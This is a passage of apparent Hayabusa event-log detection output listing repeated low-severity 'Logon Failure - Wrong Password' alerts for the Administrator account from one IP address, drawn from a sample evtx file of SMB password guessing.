NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IySarHtsTvwSP56H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnUy8tbCIAVnmhDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bfBtc4MnMtPG6MpC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37b8MGIHY8QwXf9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDuaWikplDmJNmIE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kSSoAYJILHCPI7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9ikrtTGcZYU1556 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ypyd6SagvUXQHhtZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWS37lIJ3Q6ghgMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H211KmFImpBRwTGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64tO5iBehXQcNc49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xvxDngRj3j5TAwST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8VYRjMnxDgUTWYf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhWphTesbUf0hwi1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MO8VRRVANxIkDzEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ziSXANiDAf7LRFz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g0CvYYtyEcU2riBX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPg2LKgWMeM0Oqo0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbzL9T2d4RdeCz4q : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PeEfbWpoipfYtOKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RKJW1vSrIAbRTzyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aU4G8NBru22Vc4Cl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sacBcqxV97FUihrd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 41Ms0lEMeT0jYxYj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkQWVEHGM1NxowR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qKqRY7L2IQRoU57 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMIkvwbvqc9V6CFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PehzjCnK42ZPUE7e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fqw2GWiYfO0kU83 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFPJJNCFdPJl4igl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zc6CrAr7YoozKB6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHXminAIeV4ZJIK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06YmUCHNZqbaZMdZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fYoENCtP2uPy9xNh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TRJRuXJTTH1afAfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpnkzTlc3Uvj3hpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIuD8haFzR8P87rL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL1IreMAiE564NXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMUiCaMGBC46MnPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MOSWbwooyb60LExG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSDNF7s3vbtkZIOz : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JBMk0qOV6237XtK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j41R1U1tYPvApCkZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcPkVZSeg5VwChW8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDLxt5gaFDTKsiVl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94JvBKdxJkawQQMT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KgBMk00K3iC1GQem : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XdGOj9Ybm6bcCo3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: by6F4YKorxhp5ahn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1G6ZOgOaV6luDQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qqSwNfvpPLQd6ZH1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mxtJJj54xSzHibHI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Y3yznfdaZ7dtwDO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esllFn4asbLxwkBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Pr0cgd6cF5ukhZ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pS2fabTrbl6rZ1NB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkylDDmUyuT57HdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Aqs8rSvuLAQuhfDp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KI07KTgBJc4kBSKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Re3n3nJ8EEhRRT3G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BzspAC3z1csEn0Ve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tpkb6bf42SLUst3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1F5d2wn60OgAExW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bhPNRHWhTyonDPuA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zEsnyWpUuHVBo6et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I2FwaWy9TALkk9eU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fuikeQsxlOUVifVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZWdsRJp9fHypPI1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0j0IBX2eZnx99n9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YIZ5Knxg0xr0WmDb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wuej3f7mEoWmd4SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0LcCi06ilIhFPwb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWsCGgoFmH06rRf4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP47JjNKqtYIZPsC : IP Address: 192.168.198.149 : AuthPackage: 
